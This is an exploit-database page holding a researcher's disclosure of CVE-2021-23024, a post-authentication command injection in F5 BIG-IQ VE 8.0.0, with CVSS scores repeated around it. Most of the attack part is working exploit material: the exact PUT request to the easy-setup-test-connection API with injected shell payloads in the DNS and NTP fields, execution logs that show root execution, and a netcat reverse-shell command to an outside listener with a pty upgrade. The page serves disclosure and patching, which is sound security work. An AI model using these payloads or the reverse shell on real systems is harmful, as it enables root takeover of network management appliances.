Lucene search

K
zdtJeremy Brown1337DAY-ID-36468
HistoryJun 23, 2021 - 12:00 a.m.

F5 BIG-IQ VE 8.0.0-2923215 Remote Root Vulnerability

2021-06-2300:00:00
Jeremy Brown
0day.today
43

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.015 Low

EPSS

Percentile

86.4%

F5 BIG-IQ VE v8.0.0-2923215 Post-auth Remote Root RCE

CVE-2021-23024

=======
Details
=======

It was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection.

There are two blind command injection bugs in Test DNS Connection and Test NTP Connection features, which make request to mgmt/shared/system/easy-setup-test-connection.

User accounts tested for calling the API:

- Admin
- User + Administrator Role

SSH is enabled by default for the root user, but the system does not intend the admin account to gain a shell access:

admin:x:0:500:Admin User:/home/admin:/bin/false

But an admin (or a user with admin-like privileges) can elevate privileges to root and gain a shell via command injection in the web portal.

=====
Repro
=====

https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit

Modify and replay back the dnsServerAddresses JSON field.

=======
Request
=======

PUT /mgmt/shared/system/easy-setup-test-connection HTTP/1.1
X-F5-Auth-Token: eyJraW.....
.....

{"dnsServerAddresses":["$(id>/tmp/id)"],"ntpServerAddresses":[]}

or

{"dnsServerAddresses":["8.8.8.8"],"ntpServerAddresses":["$(whoami)"]}

========
Response
========

HTTP/1.1 400 Bad Request
Server: webd
.....

{"code":400,"message":"Dns $(id>/tmp/id) is not valid\n","originalRequestBody":"{\"dnsServerAddresses\":[\"$(id>/tmp/id)\"],\"ntpServerAddresses\":[]}","referer":"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit","restOperationId":2101063,"errorStack":[],"kind":":resterrorresponse"}

and repectively

{"code":400,"message":"NTP $(whoami) is not valid\n","originalRequestBody":"{\"dnsServerAddresses\":[\"8.8.8.8\"],\"ntpServerAddresses\":[\"$(whoami)\"]}","referer":"https://bigiq/ui/system/this-device/dns-ntp/dns-ntp-edit","restOperationId":2149253,"errorStack":[],"kind":":resterrorresponse"}

=============
Execution Log
=============

DNS:

pid=7349 executed [/bin/sh -c  dig +short +time=5 +tries=1 @$(id>/tmp/id) ]
pid=7351 executed [id ]
pid=7349 executed [dig +short +time=5 +tries=1 @ ]

[root@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] config # cat /tmp/id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

NTP:

pid=1288 executed [/bin/sh -c dig +short +time=5 +tries=1 @8.8.8.8  $(whoami) ]
pid=1290 executed [whoami ]
pid=1288 executed [dig +short +time=5 +tries=1 @8.8.8.8 root ]

============
Exploitation
============

The netcat binary with -e support is installed on the system already making a remote shell easy for demo.

A command such as this will provide the connection to our client listener: "nc 10.0.0.100 5000 -e /bin/bash" while on the client we will drop into a root shell on the bigiq server.

$ nc -l -p 5000
... connection receieved

python -c 'import pty; pty.spawn("/bin/bash")'

[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # pwd

/var/service/restjavad

[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # id

uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

[@big:ModuleNotLicensed::LICENSE INOPERATIVE:Standalone] restjavad # ps
.....
32320 ?        S      0:00 su elasticsearch -s /bin/bash -c export JAVA_HOME=/usr/lib/jvm/jre-1.8.0-openjdk.x86_64;export ES_JAVA_OPTS='-Xms6000m -Xmx6000m';export ES_PATH_CONF=/var/config/rest/elasticsearch/config;exec bin/elasticsearch >/dev/null 2>&1
32335 tty1     S      0:00 python -c import pty; pty.spawn("/bin/bash")
32336 pts/0    Ss     0:00 /bin/bash

===
Fix
===

https://support.f5.com/csp/article/K06024431

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

9 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

0.015 Low

EPSS

Percentile

86.4%

Related for 1337DAY-ID-36468